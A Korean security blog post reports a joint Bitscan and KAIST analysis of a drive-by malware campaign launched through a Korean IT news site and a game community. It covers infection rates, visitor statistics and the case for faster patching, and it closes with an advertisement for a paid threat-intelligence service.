    좀비 PC를 만들기 위해 공격자들은 환경에 맞는 공격코드들을 세트 형식으로 운용을 하고 있으며 방문자의 다양한 PC 환경에 맞추어 여러 취약성들을 나누어서 공격하도록 되어 있다. 최종적으로는 악성코드의 설치에 여러 취약성을 이용하는 형태를 띄고 있다. 더구나 이 모든 악성코드들은 국내의 사용 비율이 높은 백신들에 대해서는 이미 우회 테스트를 한 상태에서 내려와서 실시간 대응은 매우 어려운 환경이며 악성코드 파일 자체가 다운로드 된 것은 제한 없이 방문자 PC를 좀비 PC화 했다는 것을 의미한다. 각 취약성에 대한 보안업데이트들은 충분히 나와 있으나 현재 상태에서도 국내의 일반적인 PC 환경은 업데이트 미비로 인한 피해도가 매우 높음을 알 수 있다. 업데이트가 출현한 상태에서도 성공률이 60%인데, 업데이트도 나오지 않은 제로데이 공격이면 성공률은 90% 이상으로 높아질 것으로 보인다. 그러나 현재 상태에서도 충분히 공격자는 소기의 목적을 달성 하고 있다고 볼 수 있다.

     

    l  분석 데이터

     


    접속횟수의 기준은 레퍼러(Referer)를 기준으로 한 수치이며 중소 IT 전문 언론사를 통한 새벽 시간대의 유입도 상당히 높은 수준임을 볼 수 있다. 더불어 게임 커뮤니티의 접속은 공격 시작 시간이 새벽임에도 불구하고 접속률은 매우 높은 통계를 보이고 있다.



    동 시간대의 접속 국가별 통계는 다음과 같다.


    <접속 IP 통계 >

    국내 IT관련 언론사 한 곳과 국내의 게임 커뮤니티 사이트에 대한 공격이라 92% 이상의 접근 IP가 국내의 IP임을 확인 할 수 있다. 방문자들의 운영체제 비율은 95.2% 가량이 Windows 운영체제임을 보이고 있다.

     


    악성링크에 연결된 브라우저별 접근 정보는 다음과 같다.



    여전히 국내에서는 Windows 플랫폼과 Internet Explorer의 사용비율이 높음을 볼 수 있다. 그리고 본 통계치는 공격자에 의해 수집된 로그를 기반으로 하였고 특정 커뮤니티와 제한된 시간이라는 제약이 있어서 전체적인 평균을 대변 하기는 어려움이 있는 자료이다.  최근 공격 동향으로는 Flash에 대한 공격이 매우 자주 발생 되고 있고 계속 변화되고 있어서 비단 IE Windows 의 사용비율이 높다고 하여 감염이 높은 것으로 보기에도 어려움이 있다.

     

    긴급하게 국내의 PC 환경에서 필요한 부분들은 각 어플리케이션에 대한 업데이트가 필요하며, 업데이트 출현 이전이라도 (Flash Java의 경우) 공격이 발생 되었을 경우 차단 할 수 있는 방안들에 대한 진지한 모색이 필요하다. 사후 대응으로는 현재의 심각한 상황을 넘기기엔 힘겨워 보인다.

     

    결론적으로 악성코드 감염 비율로 살펴 보았을 때 Flash, IE, Java, Windows Media에 대한 복합화된 공격의 성공률은 현재 60% 수준으로 볼 수 있다. 공격자들은 단일 취약성을 공격하는 것이 아닌 여러 취약성을 동시에 공격하여 이 중 하나만 문제가 있어도 바로 권한을 획득하는 형태로 공격 형태가 갖추어져 있으며 그 결과로 악성코드를 중계하는 모든 웹서비스의 방문자중 60% 가량은 좀비 PC화가 된다. 국내의 대규모 커뮤니티 및 파일 공유 사이트의 방문자들중 60% 가량은 좀비 PC일 가능성이 매우 높다는 것을 증명하는 최초의 증거이다.  문제 원인으로는 여전히 각 취약성별 업데이트가 제대로 이루어지지 않고 있다는 것과 국내에서 주로 사용 되고 있는 백신 제품들에 의한 차단 효과가 그리 높지 않음을 의미 하며, 또한 Java Flash 같은 개별 제품의 업데이트에 의존하는 어플리케이션들도 지금과 같은 수동적인 업데이트 방식과 늦은 대응으로는 한계가 있을 수 밖에 없다는 것을 증명한다.

     

    악성코드 및 악성링크에 대한 공동 분석을 주도 했던 전 상훈 빛스캔㈜ 기술이사는 그 동안 알려지지 않았던 웹을 통한 악성코드 유포의 결과와 위험성에 대한 실제적인 데이터가 발견 되어 국내의 상황이 생각보다 심각함을 확인 할 수 있었고, 현재의 대응 수준보다 더 선제적이고 빠른 대응이 시급하게 요구 되는 상황이다.” 라고 분석의 결과와 의미를 정리 하였다.

     

    * 국내 환경에서 발생되는 실질적인 공격과 위험성에 대한 조사와 대응을 위해 빛스캔㈜와 카이스트 사이버보안연구센터에서는 공동으로 위협정보 제공 서비스를 3월부터 운영을 할 예정입니다.  제한된 고객사 (기업, 기관 등의 실무 보안조직과 운영 조직이 있는 경우에 필요한 정보임)에 한해 유상으로 서비스를 시작 할 예정이므로 샘플 보고서와 서비스에 대한 안내가 필요한 기업은 info@bitscan.co.kr 로 메일로 문의 바랍니다.

     

    Posted by 바다란